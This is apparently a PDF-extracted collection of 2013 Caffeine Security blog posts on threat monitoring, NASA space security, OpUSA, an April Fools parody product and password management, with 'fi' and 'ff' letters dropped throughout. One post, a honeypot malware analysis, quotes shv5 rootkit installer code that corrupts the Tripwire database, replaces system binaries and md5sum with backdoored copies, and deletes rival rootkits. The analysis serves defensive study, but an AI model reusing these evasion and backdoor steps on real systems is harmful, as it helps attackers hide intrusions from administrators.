1. http://www.thehackerspost.com/2013/03/opisrael-hacktivists-starting-cyber.html 2. https://recordedfuture.com/live/sc/4SubR5Gj9HXm 3. http://1.bp.blogspot.com/-P703Bsb3s1A/UUTW1ym7WyI/AAAAAAAAAWs/eBWcQBuC93U/s1600/BFPLxuCCAAIMbEs.jpg 4. https://twitter.com/pinupgirllover/status/311816854240886784 5. http://caffeinesecurity.blogspot.com/2013/01/anonymous-and-steganography-blindly.html
3.3.6
Threat Watch Updated with Cyber Threat Forecasting (2013-03-25 09:01)
Thanks to the folks at [1]RecordedFuture I have updated the [2]Threat Watch page with a 90 day cyber threat forecast monitor. The monitor is also reproduced in this post below: [3]Cyber Threat Forecast - Next 90 Days via Recorded Future IFRAME: [4]https://recordedfuture.com/live/sc/7eW08kJt7MzF?embed=true &rs=true &vs=false &embedpopovers=true IFRAME: [5]https://recordedfuture.com/live/sc/4YDn6odE0TpQ?embed=true &rs=true &vs=false &embedpopovers=true
1. http://www.recordedfuture.com/ 2. http://caffeinesecurity.blogspot.com/p/threat-watch.html 3. https://recordedfuture.com/live/sc/4DBhXH1ctlHt 4. https://recordedfuture.com/live/sc/7eW08kJt7MzF?embed=true&rs=true&vs=false&embedpopovers=true 5. https://recordedfuture.com/live/sc/4YDn6odE0TpQ?embed=true&rs=true&vs=false&embedpopovers=true
138
3.4. April
BlogBook
3.3.7
Free Windows 8 Security eBook! Expires 4/4 (2013-03-29 21:29)
[1] [2]Receive Your Complimentary eBook NOW! Windows 8 Security (Free eBook oer expires on 4/4) As an IT professional, you are quite possibly being asked to review Windows 8 and determine if it is a good t for your organization. Or, you are being asked to implement Windows 8 or develop a transition plan that moves your organizations systems from their current operating system to Windows 8 over time. Other than the interface, which is of course the focus of the user experience, Windows 8 comes with increased security features designed to make your life as an IT professional easier. These features are supposed to enhance security and give you enhanced tools for support and protection. Some of the topics covered in this eBook, UEFI, Dynamic Access Control, BranchCache, DirectAccess, BitLocker, Virtualization, Social Media, SmartScreen and WindowsToGo. Does Windows 8 deliver on this promise? Find out in this eBook. [3]Get your copy today!
1. http://2.bp.blogspot.com/-Hf_Fm4OCot4/UVY_iIgpSkI/AAAAAAAAAW8/8uUhm6BlNFc/s1600/w_wing03c.gif 2. http://caffinesecurity-blogspot.tradepub.com/free/w_wing03/prgm.cgi 3. http://caffinesecurity-blogspot.tradepub.com/free/w_wing03/prgm.cgi
3.4
April
3.4.1
The Cyber Security Silver Bullet is Finally Here! (2013-04-01 14:08)
Due to the overwhelming demand for an all-in-one security solution, Caeine Security is happy to announce our solution, which we are releasing as Caeine Security Silver Bullet. This net appliance will be the ultimate solution to all of your security needs. Here is an infogram of everything contained within the Silver Bullet. Click to enlarge.
139
BlogBook
3.4. April
[1]
Heres a breakdown of what you get in the Silver Bullet:
Virus Sterilizer - Scans all incoming packets and automatically identies viral packets. These packets are replaced with null terminators, which have been specically designed not to become self-aware.
Intrusion Zapper - Provides intrusion prevention for network and physical access. When a physical intrusion is detected, a small electrical charge is sent to the oender. If the oender does not leave, increased voltage is applied, until the oender leaves or is incapacitated.
Phish Fryer - Detects any employee responses to Phishing emails, and automatically cooks the email, replacing the credentials with false ones, wasting the phishers time. An alert is also sent to management, so that the employee can be disciplined appropriately.
Social Engineer Deterrence Headslapper - Monitors employee communications for responses to social engineering. Should an employee begin to respond to social engineering, a robotic arm locates the employees position and provides a gentle head slap as a reminder not to respond.
RFC1149 Transmission Redundancy Module - monitors for lost network packets. If network packet loss exceeds the predened threshold, the RFC1149 module will kick in and begin releasing network transmissions through the redundant carrier system.
BONUS Green Backup Generator - The backup generator can provide enough power to keep your network room running in the case of a power failure. Through the marvels of science, this generator requires only small amounts of food and water to keep running indenitely. 140
3.4. April
BlogBook
[2] Above is the power source used by the prototype backup unit. The actual backup unit uses two of the above power sources, which will alternate spinning the generator ywheel. Optionally, a third power source can be added for redundancy. These power sources are self replicating, and the housing unit should be cleaned periodically during routine maintenance windows. Final production release of the Silver Bullet is still TBD, but were currently aiming for December 1, 2013. Stay tuned to Caeine Security, and youll recieve further updates on this latest innovation!
1. http://3.bp.blogspot.com/-kUr2yHS6A-4/T3hrlvbMJ7I/AAAAAAAAAJQ/zma75I6YKRY/s1600/CaffSecSilverBullet.png 2. http://4.bp.blogspot.com/-JvGCkEWud1g/T3hxuUwTdmI/AAAAAAAAAJY/HGBN5glU7T0/s1600/giant-hamster.jpg
3.4.2
If you could ask a question about Space Security what would it be?
(2013-04-02 19:51)
[1] Ive been given an excellent opportunity to attend the NASA/Orbital [2]Antares rocket test launch at Wallops Flight Facility in Wallops Island Virginia under NASAs [3]social media credentials program. I hope to learn and share fascinating information such as how remote ight telemetry and control of spacecraft is secured from tampering and interception. However - since my blog wouldnt be the same without reader interaction - Id like to take the time to nd out what information security related questions my readers would like to have answered. Please go to Facebook and [4]answer the poll! Feel free to add your own question if you dont see one listed youre interested in. Please try to keep questions information security/computer security related. I will gather questions until a few days before launch - then select the best ones from the poll.
1. http://4.bp.blogspot.com/-w_cO1L_Ku7c/UVtumRB1C_I/AAAAAAAAAXM/yojNueGG4D0/s1600/NASA_logo.png 2. http://www.orbital.com/SpaceLaunch/Antares/ 3. http://www.nasa.gov/connect/social/credential_antares_apr2013.html 4. https://www.facebook.com/questions/455078737899513/
141
BlogBook
3.4. April
3.4.3
Hackers Breakfast - Absolutely Great Learning Experience (2013-04-03 20:00)
[1] Today I had the privilege of attending a free training seminar today put on by [2]TrainACE called [3]The Hackers Breakfast. The topic of the day was advanced persistent threats and one of my favorite topics honeypots. Not only did I get a free breakfast, but I learned a lot from Alex Lanstein of FireEye and Timber Wolfe of Neustar, Inc. If you havent attended one of these yet - I would strongly encourage you to do so. TrainACE provides the training completely free of charge - and youll get to learn about some of the other training opportunities which are coming up. This wasnt your typical free advertisement disguised as a seminar. In fact the training provided was extremely informative and useful - and there wasnt any pressure to buy anything or sign up for any future training classes. Id like to give a big shout out to Megan Horner for inviting me to the event. Megan recently submitted a guest blog post which you can view [4]here.
1. http://4.bp.blogspot.com/-3XYZw2T3bZM/UVy_tf4PhpI/AAAAAAAAAXc/_SsSi2u4Xus/s1600/hackersbreakfast.jpg 2. http://www.trainace.com/ 3. http://www.hackersbreakfast.com/ 4. http://caffeinesecurity.blogspot.com/2013/03/guest-post-ransomware-threat-escalates.html
3.4.4
Voices in the Static: Proactive Cyber Threat Monitoring (2013-04-05 17:26)
Your network is under attack. Right now. This very moment your public facing IP address space is being scanned and probed by someone. In fact, the entire Internet is being scanned by so many malicious attackers on a 24/7 basis that the most amount of time an unprotected computer can hope to last on the Internet without being compromised is seven minutes according to SANS. So what can you do to help determine what threats to monitor for and which ones to ignore? Read my [1]Guest Blog Post at Recorded Future to nd out more!
1. https://www.recordedfuture.com/2013/guest-post-voices-in-the-static-proactive-cyber-threat-monitoring/
3.4.5
New Research Project: Project Ackbar (Its A Trap!) (2013-04-08 19:36)
[EMBED] 142
3.4. April
BlogBook
Today Im embarking on a new long-term project. I am seeding social media sites with unique email addresses in the hopes of catching when a database has been compromised. Each email address is being setup through [1]Mailinator and the inboxes are being monitored through RSS feeds using [2]IFTT. When one of the email addresses gets an email, or a Google alert discovers the email address published on the web, I will receive an alert so that I can review and see if the email address has been compromised. Ill update any hits as they come in. So far Ive registered special email addresses on the following websites. This list will be updated as more are added. Twitter.com Facebook.com MySpace.com Big Shout Out to Timber Wolfe from NeuStar, Inc. for inspiring me to start this project. Timber was one of the presenters at TrainACEs [3]Hackers Breakfast event on 4/3/2013 and presented an excellent piece on Honey Pots, Honey Nets, and Honey Farms.
1. http://mailinator.com/ 2. http://iftt.com/ 3. http://www.hackersbreakfast.com/
3.4.6
How Rockets and Spacecraft Are Controlled Remotely (2013-04-12 10:42)
One of the topics Im hoping to discuss with NASA and Orbital on my upcoming visit to the Antares rocket launch is how rockets and spacecraft are controlled remotely - and how this communication is secured from tampering by outside parties. Im not a rocket scientist - and since this really is rocket science - I gured I should start reading up on the topic. I found on Archive.org a book from 1964 titled Radio Control of Rockets. The book was written by two Russian scientists and contributed to by NASA. It discusses the theory behind remote control of a rocket. If youre interested in learning more visit the [1]Archive.org page and start reading the book!
1. http://archive.org/details/nasa_techdoc_19660013085
3.4.7
Could you Hack the Mars Rover? (2013-04-12 10:58)
More related reading for my upcoming trip to the Antares rocket launch - this article outlines the diculties of remotely gaining control of a NASA spacecraft such as the Mars Rover. [1]http://www.extremetech.com/extreme/134334-could-you-hack-into -mars-rover-curiosity
1. http://www.extremetech.com/extreme/134334-could-you-hack-into-mars-rover-curiosity
143
BlogBook
3.4. April
3.4.8
A Potential Look at the Security Technology Behind #Antares and #Cygnus Remote Control (2013-04-12 12:14)
[1] The main purpose of the Antares rocket is to launch the [2]Cygnus spacecraft - a remotely controlled cargo craft designed to deliver cargo to/from the International Space Station. Some searching of patents by Orbital Sciences Corporation will reveal [3]a patent from 2009 describing A secondary payload interface for payload communications using a primary payload communications channel is provided. This is essentially a space version of a radio repeater or WiFi range extender - and also provides for a redundant communications network to ensure that remote controlled spacecraft and satellites can remain in constant contact with ground control. The patent discusses the potential for using communications satellites to relay commands remotely:
Although typically built with that single purpose in mind, these satellites may provide platforms for secondary payloads. For example, communications satellites can provide power, thermal control, and attitude control system (ACS) functions, as well as other services, to secondary payloads, such as, for example, earth-observing or weather-monitoring payloads. An auxiliary high rate communications system can be provided on the communications satellite to accommodate the secondary payload. And good news! The patent is designed with security (encryption) in mind!
In some embodiments, the secondary payload interface may be designed such that control and telemetry interactions with the operators of the primary payload and/or the host satellite (which may be the same or dierent) are limited. For example, control interactions may be limited to power connections. As another example, telemetry interactions may be limited to discrete telemetry points that provide insight into the basic health of the secondary payload interface. As a result, the secondary payload may still be securely controlled by its operator without involvement by the operations center of the primary payload and/or the host satellite. This approach provides segregation of signals between an encrypted state and a non-encrypted state (e.g., a red/black interface) as required by some encryption systems. 144
3.4. April
BlogBook
A second possibly related patent by Orbital describes Emergency Communications Channel Systems and Methods for Satellite Command. This patent can be accessed [4]here. This patent creates a backup system for satellite communications - ensuring availability of control if something goes wrong with traditional satellite communications.
[5] To address [...] shortcomings within [remote satellite control], an Emergency Communications Channels (ECC) satellite command system according to one aspect of invention enables commanding of a satellite by remotely modulating telemetry data parameters indicative of the operation of one or more of the satellites payloads by modulating signals sent directly to the payload from a ground station. The two above patents denitely show that Orbital understands the importance of implementing security and redundancy in space systems - and is actively implementing important security concepts in their spacecraft and launch systems. I look forward to discussing this topic further with them when I visit NASAs Wallops Flight Facility in a few days.
1. http://3.bp.blogspot.com/-Hw0DMzeFmsg/UWgrhEIy1kI/AAAAAAAAAXs/SIEcEy9uUMk/s1600/orbital-patent.jpg 2. http://www.orbital.com/NewsInfo/Publications/Cygnus_fact.pdf 3. http://www.faqs.org/patents/app/20090052369 4. http://www.faqs.org/patents/app/20120259485 5. http://2.bp.blogspot.com/-sYcMoi0bM3A/UWgvc12mUwI/AAAAAAAAAX0/4sJ9WwkOpwQ/s1600/orbital-patent-2.png
3.4.9
Want to Give Me Feedback During the Antares Launch Event?

(2013-04-12 19:46)
Call Me!
Because Im going to be almost completely disconnected for about a week Ive added to my blog the ability for you to leave a voicemail to give me feedback for during the Antares launch event. I will check voicemail nightly and if possible include any feedback in the next days events. Thanks!
145
BlogBook
3.4. April
3.4.10
Space Security Article Series - Stay Tuned! (2013-04-18 23:22)
I am back from my trip to Wallops Flight Facility and feverishly working on organizing all my notes and recordings to begin my series of Space Security articles. In the meantime, Id like to encourage you to check out the pictures and videos Ive uploaded from this AMAZING event! Facebook: [1]https://www.facebook.com/CaSec YouTube: [2]http://www.youtube.com/user/CaeineSecurity I will be writing a thank you letter to all of the organizations and people who took the time to meet with me, but in the meantime Id like to give a big shout out to the following organizations: NASA Wallops NASA Social Orbital Sciences Corporation ATK Thank you all for helping make the Antares NASA Social event fantastic!
1. https://www.facebook.com/CaffSec 2. http://www.youtube.com/user/CaffeineSecurity
3.4.11
Police Scanners and COMSEC (or lack thereof ) (2013-04-19 11:16)
I couldnt help but shake my head when Boston police recently shut down online streams of their police scanners during their hunt for terror suspects related to the Boston marathon bombings. Police even went so far as to [1]request people not to tweet information they hear on police scanners. And while most Twitter users complied, some began to attack other Twitter users for just providing links to working scanner streams because they were endangering the lives of ocers. Theres a logical fallacy with this thinking. The problem with shutting down online streams of police scanners is that it does nothing to prevent suspects from listening on local radio scanners. Police radio frequencies are well known, and anyone with a cheap handheld scanner can monitor them locally. Perhaps its time for police departments to begin using encrypted TAC channels during manhunts, [2]much like the military uses when in a combat zone? To provide an analogy for those less tech savvy, Boston PDs request is equivalent to shouting a secret across a crowded public auditorium, asking everyone in the auditorium not to share said secret, then continue to speak slightly softer and continue to distribute additional secrets. The strangers sitting nearby have no legal obligation not to distribute the information they overheard to the rest of the room. The only answer to the auditorium problem, much like the radio problem, is to encrypt your messages, so that even if everyone overhears, they cant understand the secret. [3]COMSEC isnt something new, and has been around for a very long time. Maybe its time for civilian police departments to catch up.
1. http://www.dailydot.com/news/bostom-police-stop-tweeting-locations/ 2. http://www.armedforces-int.com/article/military-encryption-in-the-armed-forces-today.html 3. http://en.wikipedia.org/wiki/Communications_security
3.4.12
Space Security Starts on the Ground (2013-04-19 20:03)
This is the rst of a series of articles on Space Security. In the article series, we will look at the current strengths and weaknesses of NASAs cyber security eorts. [EMBED] 146
3.4. April
BlogBook
The above video was taken on April 17, 2013 at Wallops Flight Facility during the Antares NASA Social launch event. In it, Deputy Administrator Lori Garver discusses the importance of Cyber Security and NASA. NASA was criticized in 2009 by the Government Accountability Oce (GAO) for having security vulnerabilities in key networks, despite important progress in securing their computer systems. According to the report:
Although NASA has made important progress in implementing security controls and aspects of its information security program, it has not always implemented appropriate controls to suciently protect the condentiality, integrity, and availability of the information and systems supporting its mission directorates. Specically, NASA did not consistently implement eective controls to prevent, limit, and detect unauthorized access to its networks and systems. For example, it did not always suciently (1) identify and authenticate users, (2) restrict user access to systems, (3) encrypt network services and data, (4) protect network boundaries, (5) audit and monitor computer-related events, and (6) physically protect its information technology resources. After reviewing the report, the Deputy Administrator concurred with its ndings and set forth a plan to improve:
In providing written comments on a draft of this report (reprinted in app. IV), the NASA Deputy Administrator concurred with our recommendations and noted that many of the recommendations are currently being implemented as part of an ongoing strategic eort to improve information technology management and IT security program deciencies. In addition, she stated that NASA will continue to mitigate the information security weaknesses identied in our report. The actions identied in the Deputy Administrators response will, if eectively implemented, improve the agencys information security program. The full report can be read on the GAO website, [1]report GAO-10-4. But has NASA improved their security on the ground? While NASA employees were unable to provide me any specic details of their cyber security program, some information about the program is available online. The rst stop is NASAs Oce of the Chief Information Ocer (CIO). On the CIOs webpage, a [2]list of all relevant NASA security documentation can be found. These documents are all dated and given report numbers. While the actual documents are not available online, the titles are provided. A total of thirty-three IT Security Handbooks are listed on the site, with all handbooks having an eective date of 2010 or later, most of which are dated in 2012 or 2011. Several of the handbooks are based upon [3]FIPS 199 which helps enable agencies to meet [4]FISMA requirements. So from a policy standpoint, NASA is showing denite signs of improvement. But what about raw numbers? What about the actual number of security incidents at NASA? According to the GAO report, NASA reported 1,120 security incidents that resulted in the installation of malicious software on their systems or unauthorized access to sensitive data in FY 2007 and FY 2008. Flash forward to a Threat Post [5]article from March 2012. In FY 2010 and FY 2011, NASA reported 5,408 similar security incidents. At rst glance, this sharp increase appears to reect poorly on NASA. However, it is important to take into account that this is reported incidents, and not actual incidents. It is quite likely that prior to improving their security posture, NASA was experiencing just as many, if not more security incidents, and they just didnt know it due to inadequate monitoring. Fact of the matter is, NASA is still playing catch up with their cyber security program. Based upon the documents listed on their website, NASA has the framework in place for a robust cyber security program, it just needs to take the time to make sure all of its employees
147
BlogBook and contractors have complied with their personal responsibility to enforce the program. Stay tuned for the next article on Space Security, coming soon!
1. http://www.gao.gov/assets/300/296854.pdf 2. http://www.nasa.gov/offices/ocio/itsecurity/ 3. http://www.itl.nist.gov/lab/bulletns/bltnmar04.htm 4. http://csrc.nist.gov/groups/SMA/fisma/index.html 5. http://threatpost.com/nasa-computers-hacked-repeatedly-last-two-years-030312/
3.4. April
3.4.13
When it Comes to Space Security, Safety is Key (2013-04-21 16:21)
[1] This is the second article in my series on [2]Space Security. The Orbital [3]Antares rocket, scheduled to launch later today, is an excellent example of how important safety and security is for a space ight. During my recent trip to the Antares launch pad at NASAs [4]Wallops Flight Facility, I had the chance to discuss with former astronaut Carl Walz, currently Orbital [5]Vice President of Human Space Flight Operations, the safety and security features incorporated into Antares as well as Cygnus, the cargo craft which will be launched by Antares later this year. Safety is critical for any rocket launch, especially when it comes to protecting human life. Much like most computer data centers, the Antares launch pad has redundant power systems: a commercial power feed, as well as generators the size of tractor trailers. These systems are setup to automatically switch over in the case of a failure. After all, you dont want to suddenly lose power while youre in the middle of a nal countdown. Further similar to a data center, a rocket launch requires continuous monitoring. Any failure in monitoring could be disastrous, as a critical problem could be overlooked. Monitoring occurs during all phases of the mission - from launch pad, to lifto, to ight, until the mission is completed. In fact, the rst attempt to launch Antares had to be aborted due to [6]early detachment of a data cable. 148
3.4. April
BlogBook
There are multiple, redundant systems in place to not only verify the Antares rocket isnt headed towards a populated area, but also to destroy all sections of the rocket if theres a chance the rocket could even come close to impacting a populated area. Multiple systems are used to track the position and trajectory of Antares. NASA tracks the rocket primarily through RADAR, but the rocket also transmits GPS and accellerometer information. A computer uses the tracking information to verify the course is not outside the safety zone, as well as constantly generate an instantaneous impact point which uses physics to model what the impact would be if the rocket needed to be remotely destroyed. Antares contains an automatic destruct system, as well as a manual destruct system. If the Orbital built rst stage, or [7]ATK built second stage, separates prematurely, the automatic destruct system will activate, destroying the entire launch vehicle. The manual destruct system can be triggered by NASA at any time during the launch if something is going wrong, and relies upon multiple redundant UHF receivers. Note that Antares rocket does not yet include the Autonomous Flight Safety System, which has been [8]under development by NASA and [9]in test at Wallops Flight Facility. I feel very reassured after my discussions with Carl Walz, as well as several personnel from ATK and NASA, that state-of-the-art security and safety measures are in place to ensure that minimal risk to human life is present during all stages of the Antares mission. Antares is scheduled to lifto at 5 PM eastern on April 21, 2013. You can watch the launch live on [10]NASA TV. Stay updated on the launch status by following [11]@NASA Wallops, [12]@ATK, and [13]@OrbitalSciences on Twitter.
1. http://1.bp.blogspot.com/-MbjxwOdJUXE/UXQ_SfEF-nI/AAAAAAAAAYM/ACa0hwuJ5Bs/s1600/antares.jpg 2. http://caffeinesecurity.blogspot.com/search/label/Space%20Security 3. http://www.orbital.com/SpaceLaunch/Antares/ 4. http://www.nasa.gov/centers/wallops/home/index.html 5. http://www.orbital.com/NewsInfo/release.asp?prid=692 6. http://www.space.com/20714-private-antares-rocket-launch-abort.html 7. http://www.slashgear.com/atk-successfully-tests-castor-30xl-upper-stage-solid-rocket-motor-29275723/ 8. http://www.spacewar.com/reports/NASA_Developing_Autonomous_Flight_Safety_System_.html 9. http://www.nasa.gov/centers/wallops/news/subtecIII_prt.htm 10. http://www.ustream.tv/nasahdtv 11. https://twitter.com/NASA_Wallops 12. https://twitter.com/ATK 13. https://twitter.com/OrbitalSciences
3.4.14
Hacking the News for Prot - Stock Short Selling (2013-04-23 20:15)
Today the Associated Press Twitter account was hacked (quite possibly as the result of a sophisticated spear phishing campaign), and started posting fake news headlines. Specically, a news headline was posted that there were multiple explosions in the White House, and that the president had been injured.
149
BlogBook
3.4. April
[1] And while the fact that [2]@AP was compromised was fascinating, what happened next is what should really get your attention. Shortly after the fake headline was posted, the Dow Jones plummeted 150 points.
[3] While the stock market recovered quickly after the news turned out to be fake, someone could have potentially made millions. If someone knew when and what stocks were going to drop due to the hacked Twitter accounts announcement, they could have performed a [4]short sell on the aected stock(s). Even if the aected stocks only provided a 1 % return, a short on $100,000,000 worth of stocks would result in a $1,000,000 prot. Something tells me this wont be the last time we see stocks aected by a hacked social media account announcing fake news. Theres a potential for great prot in it.
1. http://1.bp.blogspot.com/-20pd7CvcLNk/UXcWOcpIJ-I/AAAAAAAAAYc/HiCresM_KpM/s1600/aphacked.png 2. https://twitter.com/AP 3. http://2.bp.blogspot.com/-9rIwcvDTjEY/UXcX9YNNsMI/AAAAAAAAAYw/Tls1jIiEE40/s1600/djia.png 4. http://www.investopedia.com/university/shortselling/shortselling1.asp
3.4.15
Guest Post: I Can Have Most of My Threat Research Tools in a Single Interface?
(2013-04-26 14:06)
The following is a guest post submitted to Caeine Security. The owner of Caeine Security is not responsible for its content. This post is being shared because I feel this has the potential to be a very informative webinar. I previously attended a TrainACE Hackers Breakfast which you can read about in a [1]previous post. The answer is Yes! Join Advanced Security by TrainACE in this FREE, hour long webinar covering a few aspects of Advanced Threat Intelligence. During this webinar, youll be part of a live demo analysis of 150
3.5. May
BlogBook
suspected malicious URL. Each malicious URL has the potential to completely cripple a companys network infrastructure and its important that any string which looks suspicious be fully analyzed before it falls into the hands of an unsuspecting victim. Attendees will also be shown how to eectively complete the majority of threat research from a single interface. Compiling all data into one spot will make it more manageable and make analysis much more eective. [2]REGISTER HERE NOW; space is limited! TrainACE is an IT Certication and cyber security training company. This is only one of many [3]free hacking tutorials they provide to the public. They also host regular meet-ups and events to discuss the latest and greatest topics in cyber security. About the Author This is a guest post from [4]Megan Horner, Marketing Coordinator at TrainACE. TrainACE oers [5]advanced cyber security training such as Mobile Hacking and Wireless Security. Follow TrainACE on Twitter [6]@pentesttraining.
1. http://caffeinesecurity.blogspot.com/2013/04/hackers-breakfast-absolutely-great.html 2. http://www.trainace.com/security/advanced-threat-intel-webinar/ 3. http://www.trainace.com/security/security-events-webinars/ 4. https://plus.google.com/u/0/108360956002935408468/about 5. http://www.trainace.com/security/ 6. http://twitter.com/pentesttraining
3.5
3.5.1
May
April 2013 Set a New Record for My Blog - Over 14,000 page views!
(2013-05-01 11:39)
Im happy to say that April 2013 set a new record for my blog, with 14,573 unique page views. Id just like to say thank you to everyone who takes the time to read my blog! With this large inux of visitors, I need to start working on more research projects and more content. Some of the research projects I want to get started on require funding. So if you would be so kind as to take a look at my [1]Complimentary Industry Resources site, nd something you like, and sign up for it, I would greatly appreciate it. It wont cost you anything, and I get paid for every download or magazine subscription! Thanks!!!!
1. http://caffinesecurity-blogspot.tradepub.com/?pt=cat&page=Infosec&flt=all
3.5.2
Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats
(2013-05-01 12:29)
Reviewing some of the malware setup scripts Ive collected through my honeypot, the following code really caught my attention. This code is from the shv5 rootkit, which was released in 2010, and is detected by [1]most antivirus scanners.
echo -n $ {DCYN }[ $ {WHI }sh $ {DCYN }] # checking for tripwire... $ {RES } uname=uname -ntwd=/var/lib/tripwire/ $uname.twd if [ -d /etc/tripwire ]; thenecho $ {WHI } ALERT: TRIPWIRE FOUND! $ {RES } if [ -f /var/lib/tripwire/ $uname.twd ]; thenchattr -isa $twdecho -n $ {DCYN }[ $ {WHI }sh $ {DCYN }] # checking for tripwire-database... $ {RES }echo $ {RED } ALERT! tripwire
151
BlogBook
3.5. May
database found $ {RES }echo $ {DCYN }[ $ {WHI }sh $ {DCYN }] # $ {WHI } dun worry we got handy-tricks for this :) $ {RES }echo > $twdecho Tripwire segment-faulted ! $twdecho $twdecho $twdecho The reasons for this may be: $twdecho $twdecho corrupted disc-geometry, possible bad disc-sectors $twdecho corrupted les while checking for possible change etc. $twdecho echo pls. rerun tripwire to build the database again! $twdecho $twdelseecho $ {WHI } lucky you: Tripwire database not found. $ {RES }elseecho $ {WHI } guess not. $ {RES } For those not familiar with it, [2]Tripwire is designed to monitor system les for unauthorized tampering. The above code, in all its simplistic glory, eectively negates any protection oered by Tripwire. It does so by simply corrupting the Tripwire database, and making the administrator think it was due to a disk error. The same malware setup later on records the MD5 hash of certain key system les prior to installing the malware.
# Say hello to md5sum xer boys n gurls ! if [ -f /sbin/ifcong ]; then/usr/bin/md5sum /sbin/ifcong .shmd5if [ -f /bin/ps ]; then/usr/bin/md5sum /bin/ps .shmd5if [ -f /bin/ls ]; then/usr/bin/md5sum /bin/ls .shmd5if [ -f /bin/netstat ]; then/usr/bin/md5sum /bin/netstat .shmd5if [ -f /usr/bin/nd ]; then/usr/bin/md5sum /usr/bin/nd .shmd5if [ -f /usr/bin/top ]; then/usr/bin/md5sum /usr/bin/top .shmd5if [ -f /usr/sbin/lsof ]; then/usr/bin/md5sum /usr/sbin/lsof .shmd5if [ -f /usr/bin/slocate ]; then/usr/bin/md5sum /usr/bin/slocate .shmd5if [ -f /usr/bin/dir ]; then/usr/bin/md5sum /usr/bin/dir .shmd5if [ -f /usr/bin/md5sum ]; then/usr/bin/md5sum /usr/bin/md5sum .shmd5 The setup then continues to backup current system les and replace them with malware-infected copies:
# Backdoor ps/top/du/ls/netstat/etc.. cd $BASEDIR/bin BACKUP=/usr/lib/libsh/.backupmkdir $BACKUP # ps ...if [ -f /usr/bin/ps ]; thenchattr -isa /usr/bin/pscp /usr/bin/ps $BACKUPmv -f ps /usr/bin/pschattr +isa /usr/bin/ps if [ -f /bin/ps ]; thenchattr -isa /bin/pscp /bin/ps $BACKUPmv -f ps /bin/pschattr +isa /bin/ps # ifcong ...chattr -isa /sbin/ifcongcp /sbin/ifcong $BACKUPmv -f ifcong /sbin/ifcongchattr +isa /sbin/ifcong # netstat ...if [ -f /usr/sbin/netstat ]; thenchattr -isa /usr/sbin/netstatmv -f netstat /usr/sbin/netstatchattr +isa /usr/sbin/netstat The md5 tool is even replaced with a custom copy, designed to return the original hash values recorded earlier:
# md5sum ...chattr -isa /usr/bin/md5sumcp /usr/bin/md5sum $BACKUPmv -f md5sum /usr/bin/md5sumchattr +isa /usr/bin/md5sum Now that the attacker has a silent foothold on the system, the setup script proceeds to check for potentially vulnerable services, as well as even check for other rootkits: 152
3.5. May # CHECKING FOR HOSTILE ROOTKITS/BACKDORS mkdir $HOMEDIR/.owned if [ -f /etc/ttyhash ]; then chattr -AacdisSu /etc/ttyhash rm -rf /etc/ttyhash if [ -d /lib/ldd.so ]; then chattr -isa /lib/ldd.so chattr -isa /lib/ldd.so/* mv /lib/ldd.so $HOMEDIR/.owned/tk8 echo $ {RED }[ $ {WHI }sh $ {RED }] # tk8 detected and owned ...!!!! $ {RES } if [ -d /usr/src/.puta ]; then chattr -isa /usr/src/.puta chattr -isa /usr/src/.puta/* mv /usr/src/.puta $HOMEDIR/.owned/tk7 echo $ {RED }[ $ {WHI }sh $ {RED }] # tk7 detected and owned ...!!!! $ {RES }
BlogBook
Make no mistake - todays attackers are smart. They will do whatever they can to keep a foothold on compromised systems, including blocking access by other attackers. If youre interested in seeing more, you can view the full setup script at the [3]CaSec Malware Analysis Google Code site.
1. https://www.virustotal.com/en/file/65f0a275a4ab5eeeb1d115f888527ceced0546110669fe5b4984aeb9158d8bf7/ analysis/1367425595/ 2. http://www.tripwire.com/it-security-software/security-configuration-management/file-integrity-monitoring/ 3. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/rk/var/tmp/setup
153
BlogBook
3.5. May
3.5.3
OpUSA to Strike US Government and Banking Infrastructure May 7

(2013-05-05 00:42)
Anonymous and several other hacking groups are planning to attack the US Government and Banking Infrastructure on May 7, 2013. I added a threat brieng on OpUSA, whats being targeted, and by who, to my Threat Watch site. Currently, the only named targets of this attack are Whitehouse.gov, FBI, and Bank of America. However, Im sure other targets will be included. If you work for a government agency, or in the banking agency, be vigilant, and be on the lookout for highly targeted phishing attacks. You can read the [1]full brieng at my Threat Watch site.
1. https://sites.google.com/site/caffsec/current-cyber-threats/opusa
3.5.4
eBook Review: The Password Management Guide (2013-05-05 11:02)
[1] Lets be honest. Most people have a small set of passwords they reuse on multiple websites. They come up with a password they think is secure, but by reusing the password on multiple sites, a compromise of one account results in a compromise of the rest. But nobody would want to hack you, right? Wrong. Theres a lot of value in a compromised account.
Do you use Amazon.com? A compromised account can order goods and have them shipped to a dierent address. Do you use PayPal? A compromised account could wipe out your bank account. Do you email family and friends? A compromised account could be used by scammers to trick your family and friends into sending money through Western Union to the scammer overseas. Do you use social networking? A compromised account could be used to spam your friends But remembering multiple, complex passwords is hard!!!! It doesnt have to be. I was very impressed by the information contained within The Password Management Guide. The guide covers the following topics and more:
Dangers of password re-use How to create a secure password Examples of available password manager programs 154
3.5. May Two-factor Authentication How to monitor to see if your password has been compromised
BlogBook
I found the guide very well written, and it should be extremely useful to anyone regardless of tech savvy level. And the good news is, for a limited time you can get the 35 page eBook FREE! [2]Download Here! Do you like the guide? Hate it? Feel free to let me know in the comments section below.
1. http://img.tradepub.com/free/w_make107/images/w_make107c.gif 2. http://caffinesecurity-blogspot.tradepub.com/free/w_make107/?p=w_make107
3.5.5
#OpUSA - So far an Epic Failure (2013-05-06 23:07)
In the early hours of #OpUSA, in the words of Anonymous Op has failed to deliver! Anonymous et al. actually started their hacking spree on [1]May 4...but no one really noticed. Probably because most of the websites were foreign hosted sites (you know, outside the target USA), or sites most people have never even heard of. Somewhere the SEO marketing gurus of jrzydevilmarketing.info and clearseo.net are quietly cursing, but if a tree falls on a SEO marketers website, but no one ever visits it, does it still make a sound? The attackers stepped up their game on May 5 and hacked even more websites. And by [2]more, I mean [3]more websites most people have never heard of in the USA.
Protip: Hacking Chinese, French, and Italian websites in the name of #OpUSA does not make a bit of dierence to 99.999 % of people in the USA. May 6 - They HACKED BANK OF AMERICA. OMG!!!! No...wait...they hacked [4]Blood Bank of America. Really guys? You hacked a blood bank? This speaks of fail on so many levels its not funny. Thats like using your bat to call out a home run, then hitting a ground rule double. Sure, it just went out of the park, but its nowhere near as eective. Early hours of May 7 - A [5]short list of websites was published (because these guys are clearly riding a short bus), and nally a target barely worth noting - the [6]Honolulu Police Department alert system which isnt even used anymore.
